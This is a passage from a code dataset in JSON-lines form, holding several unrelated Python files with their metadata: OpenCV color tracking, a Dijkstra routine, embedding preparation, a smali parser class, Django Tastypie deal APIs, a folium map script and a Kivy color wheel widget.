hsv_green)\n print('hsv for red : ', hsv_red)\n\n# hsv()\n# result\n# HSV for Blue: (120, 255, 255)\n# HSV for Green: (60, 255, 255)\n# HSV for Red: (0, 255, 255)\n\ndef tracking():\n try:\n print('Starting the camera.')\n cap = cv2.VideoCapture(0)\n except:\n print('Failed to start the camera!!')\n return\n\n while True:\n ret, frame = cap.read()\n\n # convert BGR to HSV\n hsv1 = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n # set the HSV ranges for blue, green and red\n lower_blue = np.array([110, 100, 100])\n upper_blue = np.array([130, 255, 255])\n\n lower_green = np.array([50, 100, 100])\n upper_green = np.array([70, 255, 255])\n\n lower_red = np.array([-10, 100, 100]) # hue wraps at 180 in OpenCV, so reds near 180 are missed here - see the two-range sketch below\n upper_red = np.array([10, 255, 255])\n\n # thresholds that keep only the pixels inside each R, G and B range of the HSV image\n mask_blue = cv2.inRange(hsv1, lower_blue, upper_blue)\n mask_green = cv2.inRange(hsv1, lower_green, upper_green)\n mask_red = cv2.inRange(hsv1, lower_red, upper_red)\n\n # bitwise-AND each mask with the original frame\n res1 = cv2.bitwise_and(frame, frame, mask = mask_blue)\n res2 = cv2.bitwise_and(frame, frame, mask = mask_green)\n res3 = cv2.bitwise_and(frame, frame, mask = mask_red)\n\n cv2.imshow('ORIGINAL', frame)\n cv2.imshow('BLUE', res1)\n cv2.imshow('GREEN', res2)\n cv2.imshow('RED', res3)\n\n k = cv2.waitKey(1) & 0xFF\n if k == 27:\n break\n\n cv2.destroyAllWindows()\n\ntracking()\n\n\n\n\n\n", "sub_path": "OpenCV/Change_Color.py", "file_name": "Change_Color.py", "file_ext": "py", "file_size_in_byte": 3250, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.uint8", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 36, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 36, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 38, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 38, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 39, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 39, "usage_type": "attribute"}, {"api_name": "cv2.VideoCapture", "line_number": 54, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2HSV", "line_number": 63, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, 
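The tracking() loop above uses lower_red = [-10, 100, 100], but cv2.inRange does no hue wraparound, so reds with hue near 179 are never matched. A hedged sketch of the usual workaround follows, combining two hue ranges with a bitwise OR; the threshold values are illustrative, not tuned numbers from the record.

import cv2
import numpy as np

def red_mask(bgr_frame):
    # red straddles the hue origin in OpenCV's [0, 179] hue scale,
    # so mask both ends of the scale and OR them together
    hsv = cv2.cvtColor(bgr_frame, cv2.COLOR_BGR2HSV)
    low = cv2.inRange(hsv, np.array([0, 100, 100]), np.array([10, 255, 255]))
    high = cv2.inRange(hsv, np.array([170, 100, 100]), np.array([179, 255, 255]))
    return cv2.bitwise_or(low, high)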
{"api_name": "numpy.array", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 76, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 77, "usage_type": "call"}, {"api_name": "cv2.inRange", "line_number": 78, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 81, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 82, "usage_type": "call"}, {"api_name": "cv2.bitwise_and", "line_number": 83, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 85, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 86, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 87, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 88, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 90, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 94, "usage_type": "call"}]} +{"seq_id": "481155667", "text": "import json\n\ninf = float('inf')\n\nif __name__ == '__main__':\n g = json.loads(open('input.txt').read())\n n = len(g)\n\n s = 0\n d = [inf] * n\n p = [0] * n\n\n d[s] = 0\n u = [False] * n\n\n for i in range(n):\n v = -1\n for j in range(n):\n if not u[j] and (v == -1 or d[j] < d[v]):\n v = j\n\n if d[v] == inf:\n break\n u[v] = True\n\n for j in range(len(g[v])):\n to = g[v][j][0]\n l = g[v][j][1]\n\n if d[v] + l < d[to]:\n d[to] = d[v] + l\n p[to] = v\n\n print(d)\n\n for i in range(1, n):\n v = i\n path = []\n while v != s:\n v = p[v]\n path.insert(0, v)\n\n path.append(i)\n\n print(\"Path from {} to {} : {}\".format(s, i, path))\n", "sub_path": "Passed/l6/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 819, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "json.loads", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "644652459", "text": "\"\"\"\nPrepare embeddings and dictionaries\n\nexport ABS_EMB=~/myfiles/vecmap/data/vecmap_output/30k.wiki.abs.src.sup.vec\nexport EXT_EMB=~/myfiles/vecmap/data/vecmap_output/30k.wiki.ext.src.sup.vec\nexport MODEL=fast_text\n\"\"\"\n\nimport pickle as pkl\nimport torch\nimport os\n\n# Insert paths\nMODEL = os.environ['MODEL']\nABS_EMB_PATH = os.environ['ABS_EMB']\nEXT_EMB_PATH = os.environ['EXT_EMB']\n\n# create abstractor DICTIONARY and and save it on disk\nvocab = {}\nfor ind, line in enumerate(open(ABS_EMB_PATH, 'r').readlines()):\n word, vec = line.split(\" \", 1)\n vocab[word] = ind\nwith open('{}/pretrained/acl/abstractor/vocab.pkl'.format(MODEL), 'wb') as fp:\n pkl.dump(vocab, fp)\n\n# save abstractor EMBEDDINGS\nweights = []\nfor line in open(ABS_EMB_PATH).readlines():\n word, vec = line.split(' ', 1)\n weights.append([float(num) for num in vec.split()])\nweights = torch.tensor(weights)\ntorch.save(weights, '{}/embeddings/abs-weights.pt'.format(MODEL))\n\n# create extractor DICTIONARY and save it on disk\nvocab = {}\nfor ind, line in enumerate(open(EXT_EMB_PATH, 'r').readlines()):\n word, vec = line.split(\" \", 1)\n vocab[word] = ind\nwith open('{}/pretrained/acl/agent_vocab.pkl'.format(MODEL), 'wb') as fp:\n pkl.dump(vocab, fp)\n\n# save extractor EMBEDDINGS\nweights = []\nfor line in open(EXT_EMB_PATH).readlines():\n word, vec = line.split(' ', 1)\n weights.append([float(num) for num in 
vec.split()])\nweights = torch.tensor(weights)\ntorch.save(weights, '{}/embeddings/ext-weights.pt'.format(MODEL))\n\n# inspect dictionaries\n#VOCAB = '3_models/fast_abs_rl_slo_model_weight_update_export_beams/pretrained_eng_model/agent_vocab.pkl'\n#VOCAB = '1_data/pretrained/new/agent_vocab.pkl'\n#\n#with open(VOCAB, 'rb') as fp:\n# dic = pkl.load(fp)\n# d_view = [(v, k) for k, v in dic.items()]\n# d_view.sort()\n", "sub_path": "embeddings/prepare_dictionary_and_weights_server.py", "file_name": "prepare_dictionary_and_weights_server.py", "file_ext": "py", "file_size_in_byte": 1810, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.environ", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 32, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "443765457", "text": "from typing import List, Union, Type, NewType, Generic\n\nfrom smali.exceptions import FormatError\nfrom smali.statements import Statement, StatementType\n\nBlockItem = NewType('BlockItem', Union[Statement, 'Block'])\nBlockItemType = NewType('BlockItemType', Union[StatementType, 'Block[StatementType]'])\n\n\nclass Block(Generic[StatementType]):\n INDENT_SIZE = 4\n INDENT_CHAR = ' '\n\n items: List[BlockItem]\n\n def __init__(self):\n self.items = []\n\n def append(self, item: BlockItem):\n self.items.append(item)\n\n def extend(self, items: List[BlockItem]):\n self.items.extend(items)\n\n @property\n def head(self) -> StatementType:\n if isinstance(self.items[0], Statement):\n return self.items[0]\n else:\n return self.items[0].head\n\n def flatten(self) -> List[Statement]:\n result = []\n for item in self.items:\n if isinstance(item, Statement):\n result.append(item)\n elif isinstance(item, Block):\n result.extend(item.flatten())\n else:\n raise FormatError(f'invalid item type: {type(item)}')\n return result\n\n @staticmethod\n def _match_item(item: Statement, **attributes) -> bool:\n for key, value in attributes.items():\n if not hasattr(item, key):\n return False\n if getattr(item, key) != value:\n return False\n return True\n\n def find(self, stmt_type: Type[StatementType], **kwargs) -> List[BlockItemType]:\n result = []\n for item in self.items:\n if isinstance(item, Block):\n if isinstance(item.head, stmt_type) and Block._match_item(item.head, **kwargs):\n result.append(item)\n else:\n result.extend(item.find(stmt_type, **kwargs))\n elif isinstance(item, stmt_type) and Block._match_item(item, **kwargs):\n result.append(item)\n return result\n", "sub_path": "smali/block.py", "file_name": "block.py", "file_ext": "py", "file_size_in_byte": 1998, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "typing.NewType", "line_number": 6, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 6, "usage_type": "name"}, {"api_name": "smali.statements.Statement", "line_number": 6, "usage_type": "name"}, {"api_name": "typing.NewType", "line_number": 7, "usage_type": 
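The shortest-path record a little further up relaxes edges with a full O(n^2) vertex scan on every step. For sparse graphs, a binary heap brings this down to O(E log V); the sketch below keeps the same g[v] = [(neighbor, weight), ...] adjacency format used by that record's input.txt, but the JSON loading and path reconstruction are omitted.

import heapq

def dijkstra(g, s=0):
    # dist[v] is the best known distance from s to v
    dist = [float('inf')] * len(g)
    dist[s] = 0
    heap = [(0, s)]
    while heap:
        d, v = heapq.heappop(heap)
        if d > dist[v]:
            continue  # stale heap entry, already improved
        for to, w in g[v]:
            if d + w < dist[to]:
                dist[to] = d + w
                heapq.heappush(heap, (dist[to], to))
    return dist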
"call"}, {"api_name": "typing.Union", "line_number": 7, "usage_type": "name"}, {"api_name": "smali.statements.StatementType", "line_number": 7, "usage_type": "name"}, {"api_name": "typing.Generic", "line_number": 10, "usage_type": "name"}, {"api_name": "smali.statements.StatementType", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 14, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 22, "usage_type": "name"}, {"api_name": "smali.statements.Statement", "line_number": 27, "usage_type": "argument"}, {"api_name": "smali.statements.StatementType", "line_number": 26, "usage_type": "name"}, {"api_name": "smali.statements.Statement", "line_number": 35, "usage_type": "argument"}, {"api_name": "smali.exceptions.FormatError", "line_number": 40, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 32, "usage_type": "name"}, {"api_name": "smali.statements.Statement", "line_number": 32, "usage_type": "name"}, {"api_name": "smali.statements.Statement", "line_number": 44, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 52, "usage_type": "name"}, {"api_name": "smali.statements.StatementType", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "463747361", "text": "# -*- coding: utf-8 -*-\nimport json\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.conf import settings\nfrom django.contrib.contenttypes.models import ContentType\nfrom tastypie.paginator import Paginator\nfrom tastypie.constants import ALL, ALL_WITH_RELATIONS\nfrom tastypie.serializers import Serializer\nfrom tastypie.validation import FormValidation\nfrom tastypie.exceptions import NotFound\nfrom tastypie.authentication import Authentication, SessionAuthentication\nfrom tastypie.authorization import Authorization\nfrom tastypie import fields\nfrom client.models import Tag\nfrom deal.models import Deal, DealItem\nfrom deal.forms import DealForm\nfrom deal.authorization import DealAuthorization, DealItemAuthorization\nfrom note.models import Note\nfrom backend_log.logging_handler import ModelResourceProxy as ModelResource\n\n\nclass DealResource(ModelResource):\n client = fields.ForeignKey('client.api.ClientResource', 'client', full=False, null=True)\n case = fields.ForeignKey('client.api.CaseResource', 'case', full=False, null=True)\n user = fields.ForeignKey('account.api.UserResource', 'user', full=False, null=True)\n\n class Meta:\n response_name = 'deal'\n queryset = Deal.active.all()\n fields = ['id', 'client', 'case', 'user', 'name', 'price', 'description',\n 'status', 'is_active', 'created', 'creator_ip', 'tag']\n filtering = {\n \"id\": ALL,\n 'is_active': ALL,\n 'created': ALL,\n 'name': ALL,\n 'price': ALL,\n 'status': ALL,\n 'client': ALL_WITH_RELATIONS,\n 'case': ALL_WITH_RELATIONS,\n }\n authorization = DealAuthorization()\n authentication = SessionAuthentication()\n validation = FormValidation(form_class=DealForm)\n serializer = Serializer(formats=['json', 'jsonp'])\n paginator_class = Paginator\n list_allowed_methods = ['get', 'post', 'put']\n detail_allowed_methods = ['get', 'post', 'put']\n ordering = ['id', 'name', 'price', 'status']\n always_return_data = True\n\n def hydrate(self, bundle):\n tag_list = bundle.data.get('tag_list', None)\n if tag_list:\n bundle.obj.tag = Tag.objects.filter(id__in=tag_list)\n return super(DealResource, self).hydrate(bundle)\n\n def dehydrate(self, bundle):\n bundle.data['pre_sale'] = {\"id\": 
bundle.obj.case.user.id, \"name\": bundle.obj.case.user.username}\n bundle.data['sell'] = {\"id\": bundle.obj.user.id, \"name\": bundle.obj.user.username}\n ticket_set = bundle.obj.ticket_set.filter(is_active=True)\n if ticket_set.exists() and ticket_set[0].assignee:\n bundle.data['after_sale'] = {\"id\": ticket_set[0].assignee.id, \"name\": ticket_set[0].assignee.username}\n\n bundle.data['username'] = bundle.obj.user.name\n bundle.data['case_name'] = bundle.obj.case\n bundle.data['case_id'] = bundle.obj.case.id\n bundle.data['case_info'] = {\n \"name\": bundle.obj.case.name,\n \"tag\": bundle.obj.case.tag,\n \"user\": bundle.obj.case.user,\n \"created\": bundle.obj.case.created,\n }\n bundle.data['tag'] = [{'id': item.id, 'name': item.name} for item in bundle.obj.tag.all()]\n bundle.data['client_info'] = [bundle.obj.client, bundle.obj.client.importance]\n bundle.data['client_id'] = bundle.obj.client.id\n bundle.data['dealitem'] = [{\n \"id\": item.id,\n \"resource_uri\": \"/api/v1/product/%s\" % (item.product.id),\n \"product_name\": item.product,\n \"product_id\": item.product.id,\n \"quantity\": item.quantity,\n \"price\": float(item.product.price)} for item in bundle.obj.dealitem_set.filter(is_active=True)]\n\n bundle.data['deal_tickets'] = [{\n \"id\": item.id,\n \"name\": item.name,\n \"username\": item.user.username,\n } for item in bundle.obj.ticket_set.filter(is_active=True)]\n\n\n bundle.data['contacts'] = {\n \"name\": bundle.obj.client.name,\n \"tel\": bundle.obj.client.tel,\n \"mobile\": bundle.obj.client.mobile,\n \"qq\": bundle.obj.client.qq,\n \"email\": bundle.obj.client.email,\n \"address\": bundle.obj.client.address,\n }\n contacts = bundle.obj.client.contact_set.filter(is_active=True)\n if contacts.exists():\n bundle.data['contacts']['others'] = [{\"id\": contact.id, \"name\": contact.name} for contact in contacts]\n if bundle.obj.price:\n bundle.data['price'] = float(bundle.obj.price)\n return bundle\n\n def obj_create(self, bundle, **kwargs):\n bundle = super(DealResource, self).obj_create(bundle, company=bundle.request.user.company, **kwargs)\n return bundle\n\n def build_filters(self, filters, **kwargs):\n orm_filters = super(DealResource, self).build_filters(filters)\n tag_filter = filters.get('tag_filter', None)\n if tag_filter:\n orm_filters['tag__id__contains'] = tag_filter\n return orm_filters\n\nclass DealItemResource(ModelResource):\n deal = fields.ForeignKey('deal.api.DealResource', 'deal', full=False, null=True)\n product = fields.ForeignKey('catalog.api.ProductResource', 'product', full=False, null=True)\n\n class Meta:\n response_name = 'dealitem'\n queryset = DealItem.active.all().filter(deal__is_active=True)\n fields = ['id', 'deal', 'product', 'quantity', 'is_active', 'creator_ip',]\n filtering = {\n \"id\": ALL,\n \"is_active\": ALL,\n \"deal\": ALL_WITH_RELATIONS,\n }\n authorization = DealItemAuthorization()\n authentication = SessionAuthentication()\n serializer = Serializer(formats=['json', 'jsonp'])\n paginator_class = Paginator\n list_allowed_methods = ['get', 'put', 'post']\n detail_allowed_methods = ['get', 'put', 'post']\n ordering = ['id']\n always_return_data = True\n\n def dehydrate(self, bundle):\n bundle.data['product_name'] = bundle.obj.product.name\n bundle.data['price'] = bundle.obj.product.price\n bundle.data['product_id'] = bundle.obj.product.id\n return bundle\n", "sub_path": "deal/api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 6243, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": 
"code-starcoder2", "pt": "32", "api": [{"api_name": "backend_log.logging_handler.ModelResourceProxy", "line_number": 22, "usage_type": "name"}, {"api_name": "client.models", "line_number": 23, "usage_type": "name"}, {"api_name": "tastypie.fields.ForeignKey", "line_number": 23, "usage_type": "call"}, {"api_name": "tastypie.fields", "line_number": 23, "usage_type": "name"}, {"api_name": "tastypie.fields.ForeignKey", "line_number": 24, "usage_type": "call"}, {"api_name": "tastypie.fields", "line_number": 24, "usage_type": "name"}, {"api_name": "tastypie.fields.ForeignKey", "line_number": 25, "usage_type": "call"}, {"api_name": "tastypie.fields", "line_number": 25, "usage_type": "name"}, {"api_name": "deal.models.Deal.active.all", "line_number": 29, "usage_type": "call"}, {"api_name": "deal.models.Deal.active", "line_number": 29, "usage_type": "attribute"}, {"api_name": "deal.models.Deal", "line_number": 29, "usage_type": "name"}, {"api_name": "tastypie.fields", "line_number": 30, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL", "line_number": 33, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL", "line_number": 34, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL", "line_number": 35, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL", "line_number": 36, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL", "line_number": 37, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL", "line_number": 38, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL_WITH_RELATIONS", "line_number": 39, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL_WITH_RELATIONS", "line_number": 40, "usage_type": "name"}, {"api_name": "deal.authorization.DealAuthorization", "line_number": 42, "usage_type": "call"}, {"api_name": "tastypie.authentication.SessionAuthentication", "line_number": 43, "usage_type": "call"}, {"api_name": "tastypie.validation.FormValidation", "line_number": 44, "usage_type": "call"}, {"api_name": "deal.forms.DealForm", "line_number": 44, "usage_type": "name"}, {"api_name": "tastypie.serializers.Serializer", "line_number": 45, "usage_type": "call"}, {"api_name": "tastypie.paginator.Paginator", "line_number": 46, "usage_type": "name"}, {"api_name": "client.models.Tag.objects.filter", "line_number": 55, "usage_type": "call"}, {"api_name": "client.models.Tag.objects", "line_number": 55, "usage_type": "attribute"}, {"api_name": "client.models.Tag", "line_number": 55, "usage_type": "name"}, {"api_name": "backend_log.logging_handler.ModelResourceProxy", "line_number": 118, "usage_type": "name"}, {"api_name": "deal.models", "line_number": 119, "usage_type": "name"}, {"api_name": "tastypie.fields.ForeignKey", "line_number": 119, "usage_type": "call"}, {"api_name": "tastypie.fields", "line_number": 119, "usage_type": "name"}, {"api_name": "tastypie.fields.ForeignKey", "line_number": 120, "usage_type": "call"}, {"api_name": "tastypie.fields", "line_number": 120, "usage_type": "name"}, {"api_name": "deal.models.DealItem.active.all", "line_number": 124, "usage_type": "call"}, {"api_name": "deal.models.DealItem.active", "line_number": 124, "usage_type": "attribute"}, {"api_name": "deal.models.DealItem", "line_number": 124, "usage_type": "name"}, {"api_name": "tastypie.fields", "line_number": 125, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL", "line_number": 127, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL", "line_number": 128, "usage_type": "name"}, {"api_name": "tastypie.constants.ALL_WITH_RELATIONS", 
"line_number": 129, "usage_type": "name"}, {"api_name": "deal.authorization.DealItemAuthorization", "line_number": 131, "usage_type": "call"}, {"api_name": "tastypie.authentication.SessionAuthentication", "line_number": 132, "usage_type": "call"}, {"api_name": "tastypie.serializers.Serializer", "line_number": 133, "usage_type": "call"}, {"api_name": "tastypie.paginator.Paginator", "line_number": 134, "usage_type": "name"}]} +{"seq_id": "362583956", "text": "import folium\nimport pandas as pd\n\n# read the volcano.txt file (even though the\n# function is 'read_csv') and store as 'df1' variable,\n# then read national_parks.csv and save as 'df2'\ndf1 = pd.read_csv(\"volcano.txt\")\ndf2 = pd.read_csv(\"us_national_parks.txt\")\ndf3 = pd.read_csv(\"us_capital.txt\")\n\n\n# correct apostrophes that mess with separation\ndf1['NAME'] = df1['NAME'].str.replace(\"'\", \"'\")\ndf2['Name'] = df2['Name'].str.replace(\"'\", \"'\")\n\navg_lat = (df1['LAT'].mean() + df2['Latitude'].mean()) / 2\navg_lon = (df1['LON'].mean() + df2['Longitude'].mean()) / 2\nlatmean = avg_lat\nlonmean = avg_lon\n\nmap = folium.Map(location=[latmean, lonmean], zoom_start=4, tiles='Stamen Terrain')\n\n\n# function that determines marker color based on elevation\ndef color(elevation):\n if elevation in range(0, 1000):\n col = 'green'\n elif elevation in range(1001, 1999):\n col = 'orange'\n elif elevation in range(2000, 2999):\n col = 'blue'\n else:\n col = 'red'\n return col\n\n\n# create a for loop that will go through each volcano and mark it. We zip it due to the different iterators we want\nfor lat1, lon1, name1, elev in zip(df1['LAT'], df1['LON'], df1['NAME'], df1['ELEV']):\n folium.Marker(location=[lat1, lon1], popup=name1, icon=folium.Icon(color=color(elev), icon_color='white', icon='cloud')).add_to(map)\n\n# create a for loop that will go through each national park and mark it gray\nfor lat2, lon2, name2 in zip(df2['Latitude'], df2['Longitude'], df2['Name']):\n folium.Marker(location=[lat2, lon2], popup=name2, icon=folium.Icon(color='purple', icon='info-sign')).add_to(map)\n\n\n# create a for loop that will go through each us city and mark it yellow\nfor lat3, lon3, city, state in zip(df3['Latitude'], df3['Longitude'], df3['CITY'], df3['STATE']):\n folium.Marker(location=[lat3, lon3], popup=city+\", \"+state, icon=folium.Icon(color='black', icon='star')).add_to(map)\n\nprint(map.save('mark_map.html'))\n\n", "sub_path": "web_map.py", "file_name": "web_map.py", "file_ext": "py", "file_size_in_byte": 1948, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pandas.read_csv", "line_number": 7, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 8, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 9, "usage_type": "call"}, {"api_name": "folium.Map", "line_number": 21, "usage_type": "call"}, {"api_name": "folium.Marker", "line_number": 39, "usage_type": "call"}, {"api_name": "folium.Icon", "line_number": 39, "usage_type": "call"}, {"api_name": "folium.Marker", "line_number": 43, "usage_type": "call"}, {"api_name": "folium.Icon", "line_number": 43, "usage_type": "call"}, {"api_name": "folium.Marker", "line_number": 48, "usage_type": "call"}, {"api_name": "folium.Icon", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "319008421", "text": "from kivy.uix.colorpicker import rect_to_polar\nfrom kivy.uix.widget import Widget\nfrom kivy.properties import (NumericProperty, BoundedNumericProperty,\n ListProperty,\n 
ReferenceListProperty)\nfrom kivy.clock import Clock\nfrom kivy.graphics import Color\nfrom math import pi\n\nfrom colorPickerCustom.colorArc import _ColorArc\nfrom colorPickerCustom.colorPickerApp import distance\n\n\nclass ColorWheel(Widget):\n '''Chromatic wheel for the ColorPicker.\n\n .. versionchanged:: 1.7.1\n `font_size`, `font_name` and `foreground_color` have been removed. The\n sizing is now the same as others widget, based on 'sp'. Orientation is\n also automatically determined according to the width/height ratio.\n\n '''\n\n r = BoundedNumericProperty(0, min=0, max=1)\n '''The Red value of the color currently selected.\n\n :attr:`r` is a :class:`~kivy.properties.BoundedNumericProperty` and\n can be a value from 0 to 1. It defaults to 0.\n '''\n\n g = BoundedNumericProperty(0, min=0, max=1)\n '''The Green value of the color currently selected.\n\n :attr:`g` is a :class:`~kivy.properties.BoundedNumericProperty`\n and can be a value from 0 to 1.\n '''\n\n b = BoundedNumericProperty(0, min=0, max=1)\n '''The Blue value of the color currently selected.\n\n :attr:`b` is a :class:`~kivy.properties.BoundedNumericProperty` and\n can be a value from 0 to 1.\n '''\n\n a = BoundedNumericProperty(0, min=0, max=1)\n '''The Alpha value of the color currently selected.\n\n :attr:`a` is a :class:`~kivy.properties.BoundedNumericProperty` and\n can be a value from 0 to 1.\n '''\n\n color = ReferenceListProperty(r, g, b, a)\n '''The holds the color currently selected.\n\n :attr:`color` is a :class:`~kivy.properties.ReferenceListProperty` and\n contains a list of `r`, `g`, `b`, `a` values.\n '''\n\n _origin = ListProperty((100, 100))\n _radius = NumericProperty(100)\n\n _piece_divisions = NumericProperty(10)\n _pieces_of_pie = NumericProperty(16)\n\n _inertia_slowdown = 1.25\n _inertia_cutoff = .25\n\n _num_touches = 0\n _pinch_flag = False\n\n _hsv = ListProperty([1, 1, 1, 0])\n\n def __init__(self, **kwargs):\n super(ColorWheel, self).__init__(**kwargs)\n\n pdv = self._piece_divisions\n self.sv_s = [(float(x) / pdv, 1) for x in range(pdv)] + [\n (1, float(y) / pdv) for y in reversed(range(pdv))]\n\n def on__origin(self, instance, value):\n self.init_wheel(None)\n\n def on__radius(self, instance, value):\n self.init_wheel(None)\n\n def init_wheel(self, dt,):\n # initialize list to hold all meshes\n self.canvas.clear()\n self.arcs = []\n self.sv_idx = 0\n pdv = self._piece_divisions\n ppie = self._pieces_of_pie\n\n for r in range(pdv):\n for t in range(ppie):\n self.arcs.append(\n _ColorArc(\n self._radius * (float(r) / float(pdv)),\n self._radius * (float(r + 1) / float(pdv)),\n 2 * pi * (float(t) / float(ppie)),\n 2 * pi * (float(t + 1) / float(ppie)),\n origin=self._origin,\n color=(float(t) / ppie,\n self.sv_s[self.sv_idx + r][0],\n self.sv_s[self.sv_idx + r][1],\n 1)))\n\n self.canvas.add(self.arcs[-1])\n\n def recolor_wheel(self):\n ppie = self._pieces_of_pie\n for idx, segment in enumerate(self.arcs):\n segment.change_color(\n sv=self.sv_s[int(self.sv_idx + idx / ppie)])\n\n def change_alpha(self, val):\n for idx, segment in enumerate(self.arcs):\n segment.change_color(a=val)\n\n def inertial_incr_sv_idx(self, dt):\n # if its already zoomed all the way out, cancel the inertial zoom\n if self.sv_idx == len(self.sv_s) - self._piece_divisions:\n return False\n\n self.sv_idx += 1\n self.recolor_wheel()\n if dt * self._inertia_slowdown > self._inertia_cutoff:\n return False\n else:\n Clock.schedule_once(self.inertial_incr_sv_idx,\n dt * self._inertia_slowdown)\n\n def inertial_decr_sv_idx(self, 
dt):\n # if its already zoomed all the way in, cancel the inertial zoom\n if self.sv_idx == 0:\n return False\n self.sv_idx -= 1\n self.recolor_wheel()\n if dt * self._inertia_slowdown > self._inertia_cutoff:\n return False\n else:\n Clock.schedule_once(self.inertial_decr_sv_idx,\n dt * self._inertia_slowdown)\n\n def on_touch_down(self, touch):\n r = self._get_touch_r(touch.pos)\n if r > self._radius:\n return False\n\n # code is still set up to allow pinch to zoom, but this is\n # disabled for now since it was fiddly with small wheels.\n # Comment out these lines and adjust on_touch_move to reenable\n # this.\n if self._num_touches != 0:\n return False\n\n touch.grab(self)\n self._num_touches += 1\n touch.ud['anchor_r'] = r\n touch.ud['orig_sv_idx'] = self.sv_idx\n touch.ud['orig_time'] = Clock.get_time()\n\n def on_touch_move(self, touch):\n if touch.grab_current is not self:\n return\n r = self._get_touch_r(touch.pos)\n goal_sv_idx = (touch.ud['orig_sv_idx'] -\n int((r - touch.ud['anchor_r']) /\n (float(self._radius) / self._piece_divisions)))\n\n if (\n goal_sv_idx != self.sv_idx and\n goal_sv_idx >= 0 and\n goal_sv_idx <= len(self.sv_s) - self._piece_divisions\n ):\n # this is a pinch to zoom\n self._pinch_flag = True\n self.sv_idx = goal_sv_idx\n self.recolor_wheel()\n\n def on_touch_up(self, touch):\n if touch.grab_current is not self:\n return\n touch.ungrab(self)\n self._num_touches -= 1\n if self._pinch_flag:\n if self._num_touches == 0:\n # user was pinching, and now both fingers are up. Return\n # to normal\n if self.sv_idx > touch.ud['orig_sv_idx']:\n Clock.schedule_once(\n self.inertial_incr_sv_idx,\n (Clock.get_time() - touch.ud['orig_time']) /\n (self.sv_idx - touch.ud['orig_sv_idx']))\n\n if self.sv_idx < touch.ud['orig_sv_idx']:\n Clock.schedule_once(\n self.inertial_decr_sv_idx,\n (Clock.get_time() - touch.ud['orig_time']) /\n (self.sv_idx - touch.ud['orig_sv_idx']))\n\n self._pinch_flag = False\n return\n else:\n # user was pinching, and at least one finger remains. 
